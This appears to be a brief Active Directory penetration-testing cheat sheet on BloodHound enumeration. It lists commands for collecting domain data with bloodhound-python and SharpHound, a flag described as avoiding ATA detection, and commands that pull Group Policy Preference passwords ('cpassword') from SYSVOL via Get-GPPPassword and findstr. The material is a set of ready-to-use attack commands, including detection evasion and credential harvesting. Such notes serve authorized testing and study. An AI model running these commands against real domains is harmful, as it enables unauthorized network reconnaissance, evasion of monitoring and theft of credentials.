# BloodHound Enumeration

## BloodHound

### Enable Sharp-Hound

<figure><img src="https://github.com/AD-Attacks/Active-Directory-Penetration-Testing/raw/main/.gitbook/assets/blood-hound.jpeg" alt=""><figcaption></figcaption></figure>

### Supply data to BloodHound

### The generated archive can be uploaded to the BloodHound application.

**Remote BloodHound**

```bash
bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
bloodhound-python -u user -p password -ns 192.168.1.5 -d hacktor.local -c All
```

**On-Site BloodHound**

{% code overflow="wrap" %}

```powershell
#Using exe investor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>

.\SharpHound.exe  All
#Using PowerShell module investor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>
```

{% endcode %}

```powershell
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All,LoggedOn
```

### To avoid detections like ATA

```bash
Invoke-BloodHound -CollectionMethod All -ExcludeDC
```

#### Neo4j

#### Start neo4j and BloodHound UI on kali machine and load the zip/json files

```bash
sudo neo4j start
```

{% hint style="warning" %}

<pre data-overflow="wrap"><code><strong>if you found win server lessThan 2016 like as 2012 R2 or less you can use these commands to show local users 
</strong></code></pre>

{% endhint %}

this option (Local user) unavailable on win server 2016

```bash
#To show password # from powersploit 
Get-GPPPassword -Server PDC.wargrey.mon
#also to show password from sysvol in winServer2012 
findstr /S /I cpassword \\PDC\sysvol\wargrey.mon\Policies\*.xml
```